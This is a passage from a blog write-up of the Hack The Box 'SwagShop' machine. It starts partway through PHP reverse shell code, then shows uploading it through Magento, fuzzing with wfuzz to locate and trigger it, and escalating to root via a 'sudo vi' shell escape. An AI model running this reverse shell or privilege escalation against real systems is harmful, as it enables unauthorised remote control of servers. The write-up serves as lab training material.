        <span class="nx">printit</span><span class="p">(</span><span class="s2">&#34;ERROR: Can&#39;t spawn shell&#34;</span><span class="p">);</span>
        <span class="k">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">stream_set_blocking</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="mi">0</span><span class="p">);</span>
<span class="nx">stream_set_blocking</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="mi">0</span><span class="p">);</span>
<span class="nx">stream_set_blocking</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">0</span><span class="p">);</span>
<span class="nx">stream_set_blocking</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>

<span class="nx">printit</span><span class="p">(</span><span class="s2">&#34;Successfully opened reverse shell to </span><span class="si">$ip</span><span class="s2">:</span><span class="si">$port</span><span class="s2">&#34;</span><span class="p">);</span>

<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="nx">feof</span><span class="p">(</span><span class="nv">$sock</span><span class="p">))</span> <span class="p">{</span>
                <span class="nx">printit</span><span class="p">(</span><span class="s2">&#34;ERROR: Shell connection terminated&#34;</span><span class="p">);</span>
                <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="k">if</span> <span class="p">(</span><span class="nx">feof</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span> <span class="p">{</span>
                <span class="nx">printit</span><span class="p">(</span><span class="s2">&#34;ERROR: Shell process terminated&#34;</span><span class="p">);</span>
                <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="nv">$read_a</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nv">$pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
        <span class="nv">$num_changed_sockets</span> <span class="o">=</span> <span class="nx">stream_select</span><span class="p">(</span><span class="nv">$read_a</span><span class="p">,</span> <span class="nv">$write_a</span><span class="p">,</span> <span class="nv">$error_a</span><span class="p">,</span> <span class="k">null</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="nx">in_array</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="nv">$read_a</span><span class="p">))</span> <span class="p">{</span>
                <span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nx">printit</span><span class="p">(</span><span class="s2">&#34;SOCK READ&#34;</span><span class="p">);</span>
                <span class="nv">$input</span> <span class="o">=</span> <span class="nx">fread</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="nv">$chunk_size</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nx">printit</span><span class="p">(</span><span class="s2">&#34;SOCK: </span><span class="si">$input</span><span class="s2">&#34;</span><span class="p">);</span>
                <span class="nx">fwrite</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="nv">$input</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="k">if</span> <span class="p">(</span><span class="nx">in_array</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nv">$read_a</span><span class="p">))</span> <span class="p">{</span>
                <span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nx">printit</span><span class="p">(</span><span class="s2">&#34;STDOUT READ&#34;</span><span class="p">);</span>
                <span class="nv">$input</span> <span class="o">=</span> <span class="nx">fread</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="nv">$chunk_size</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nx">printit</span><span class="p">(</span><span class="s2">&#34;STDOUT: </span><span class="si">$input</span><span class="s2">&#34;</span><span class="p">);</span>
                <span class="nx">fwrite</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="nv">$input</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="k">if</span> <span class="p">(</span><span class="nx">in_array</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="nv">$read_a</span><span class="p">))</span> <span class="p">{</span>
                <span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nx">printit</span><span class="p">(</span><span class="s2">&#34;STDERR READ&#34;</span><span class="p">);</span>
                <span class="nv">$input</span> <span class="o">=</span> <span class="nx">fread</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="nv">$chunk_size</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="nv">$debug</span><span class="p">)</span> <span class="nx">printit</span><span class="p">(</span><span class="s2">&#34;STDERR: </span><span class="si">$input</span><span class="s2">&#34;</span><span class="p">);</span>
                <span class="nx">fwrite</span><span class="p">(</span><span class="nv">$sock</span><span class="p">,</span> <span class="nv">$input</span><span class="p">);</span>
        <span class="p">}</span>
<span class="p">}</span>

<span class="nx">fclose</span><span class="p">(</span><span class="nv">$sock</span><span class="p">);</span>
<span class="nx">fclose</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
<span class="nx">fclose</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
<span class="nx">fclose</span><span class="p">(</span><span class="nv">$pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
<span class="nx">proc_close</span><span class="p">(</span><span class="nv">$process</span><span class="p">);</span>


<span class="k">function</span> <span class="nf">printit</span> <span class="p">(</span><span class="nv">$string</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$daemon</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">print</span> <span class="s2">&#34;</span><span class="si">$string\n</span><span class="s2">&#34;</span><span class="p">;</span>
        <span class="p">}</span>
<span class="p">}</span>
<span class="cp">?&gt;</span><span class="err"> 
</span></code></pre></div><p>Let&rsquo;s upload it and checkout :</p>
<p><img src="/static/HACKING/swagshop-6.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>Nice! So the file is uploaded, now we have to find it, as the post said, all those files are located in :</p>
<pre><code>/your/path/to/magento/pub/media/custom_options/quote/firstLetterOfYourOriginalFileName/secondLetterOfYourOriginalFileName/md5(contentOfYourFile).extension
</code></pre><p>So let&rsquo;s fuzz the website, we&rsquo;re using <code>WFUZZ</code>:</p>
<blockquote>
<p>wfuzz -c &ndash;hc=404 -L -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt http://10.10.10.140/FUZZ</p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-sh" data-lang="sh">********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.140/FUZZ
Total requests: <span class="nv">207643</span>

<span class="o">=====================================================================</span>
ID           Response   Lines    Word       Chars       <span class="nv">Payload</span>                                           
<span class="o">=====================================================================</span>         
000000080:   <span class="m">200</span>        <span class="m">22</span> L     <span class="m">126</span> W      <span class="m">2127</span> Ch     <span class="s2">&#34;media&#34;</span>                                           
000000626:   <span class="m">200</span>        <span class="m">16</span> L     <span class="m">59</span> W       <span class="m">946</span> Ch      <span class="s2">&#34;includes&#34;</span>                                        
000000705:   <span class="m">200</span>        <span class="m">26</span> L     <span class="m">170</span> W      <span class="m">2877</span> Ch     <span class="s2">&#34;lib&#34;</span>                                             
000000878:   <span class="m">200</span>        <span class="m">20</span> L     <span class="m">104</span> W      <span class="m">1698</span> Ch     <span class="s2">&#34;app&#34;</span>                                             
000001586:   <span class="m">200</span>        <span class="m">19</span> L     <span class="m">89</span> W       <span class="m">1547</span> Ch     <span class="s2">&#34;shell&#34;</span>                                           
000001731:   <span class="m">200</span>        <span class="m">18</span> L     <span class="m">82</span> W       <span class="m">1331</span> Ch     <span class="s2">&#34;skin&#34;</span>                                            
000004398:   <span class="m">200</span>        <span class="m">22</span> L     <span class="m">126</span> W      <span class="m">2097</span> Ch     <span class="s2">&#34;var&#34;</span>                                             
000005326:   <span class="m">200</span>        <span class="m">22</span> L     <span class="m">121</span> W      <span class="m">2149</span> Ch     <span class="s2">&#34;errors&#34;</span>  
000041849:   <span class="m">200</span>        <span class="m">327</span> L    <span class="m">904</span> W      <span class="m">16097</span> Ch    <span class="s2">&#34;http://10.10.10.140/&#34;</span>                            
000045477:   <span class="m">200</span>        <span class="m">54</span> L     <span class="m">155</span> W      <span class="m">1319</span> Ch     <span class="s2">&#34;mage&#34;</span>
</code></pre></div><p>Okay so we got &ldquo;media&rdquo; here, let&rsquo;s find our reverse shell file :</p>
<p><code>http://10.10.10.140/media/custom_options/order/p/h/c377ea4c86716e8a29bcc684c2ff7adf.phtml</code></p>
<p><code>/your/path/to/magento/pub/media/custom_options/quote/firstLetterOfYourOriginalFileName/secondLetterOfYourOriginalFileName/md5(contentOfYourFile).extension</code></p>
<p>If we make a request to that URL, and if we&rsquo;re listening with netcat, we should get a shell :</p>
<p><img src="/static/HACKING/swagshop-7.png" alt="&amp;lt;- NO FUNSIONA PACO"  /></p>
<p>To work more comfortable I&rsquo;ll the terminal environment:</p>
<div class="highlight"><pre class="chroma"><code class="language-sh" data-lang="sh"><span class="c1"># NOTE : rows and columns values are mine, you have to get yours </span>

python3 -c <span class="s1">&#39;import pty; pty.spawn(&#34;/bin/bash&#34;)&#39;</span> <span class="c1"># If this doesn&#39;t works, use python instead of python3</span>
<span class="nb">export</span> <span class="nv">SHELL</span><span class="o">=</span>bash
<span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm-256color
stty rows <span class="m">59</span> columns <span class="m">235</span>
</code></pre></div><p>Now we can get the user flag !</p>
<h1 id="-part-2---privesc">[+] PART 2 - PRIVESC</h1>
<p>After some research I didn&rsquo;t find anything interest until I found this :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=sudo&#43;-l"  target="_blank" rel="noopener"
    >sudo -l</a></p>
</blockquote>
<div class="highlight"><pre class="chroma"><code class="language-sh" data-lang="sh">Matching Defaults entries <span class="k">for</span> www-data on swagshop:
    env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin

User www-data may run the following commands on swagshop:
    <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/vi /var/www/html/*
</code></pre></div><p>So we can run sudo using vi, and this is so simple :</p>
<blockquote>
<p><a class="link" href="https://explainshell.com/explain?cmd=sudo&#43;%2Fusr%2Fbin%2Fvi&#43;%2Fvar%2Fwww%2Fhtml%2FLICENSE.txt"  target="_blank" rel="noopener"
    >sudo /usr/bin/vi /var/www/html/LICENSE.txt</a></p>
</blockquote>
<p>Once we&rsquo;re running this, we&rsquo;re root, and to spawn a shell we run :</p>
<blockquote>
<p>:sh</p>
</blockquote>
<p>And if everything worked correctly, we&rsquo;re root!</p>
<pre><code>root@swagshop:/# whoami
whoami
root
</code></pre><h1 id="thanks-for-reading--">THANKS FOR READING 😊 !!</h1>

</section>


    <footer class="article-footer">
    

    
    <section class="article-copyright">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copyright" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <path d="M14.5 9a3.5 4 0 1 0 0 6" />
</svg>



        <span>Licensed under CC BY-NC-SA 4.0</span>
    </section>
    </footer>

    
</article>

     
        
    <div class="disqus-container">
    <div id="disqus_thread"></div>
<script type="application/javascript">
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "hugo-theme-stack" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

<style>
    .disqus-container {
        background-color: var(--card-background);
        border-radius: var(--card-border-radius);
        box-shadow: var(--shadow-l1);
        padding: var(--card-padding);
    }
</style>

<script>
    window.addEventListener('onColorSchemeChange', (e) => {
        if (DISQUS) {
            DISQUS.reset({
                reload: true
            });
        }
    })
</script>

    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2020 - 
        
        2021 Maikypedia
    </section>
    
    <section class="powerby">
        Built with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> <br />
        Theme <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="2.3.0">Stack</a></b> designed by <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a>
    </section>
</footer>

    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer="true"
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer="true"
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.css"integrity="sha256-c0uckgykQ9v5k&#43;IqViZOZKc47Jn7KQil4/MP3ySA3F8="crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.css"integrity="sha256-SBLU4vv6CA6lHsZ1XyTdhyjJxCjPif/TRkjnsyGAGnE="crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.5/dist/vibrant.min.js"integrity="sha256-5NovOZc4iwiAWTYIFiIM7DxKUXKWvpVEuMEPLzcm5/g="crossorigin="anonymous"
                defer="false"
                >
            </script><script type="text/javascript" src="/ts/main.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
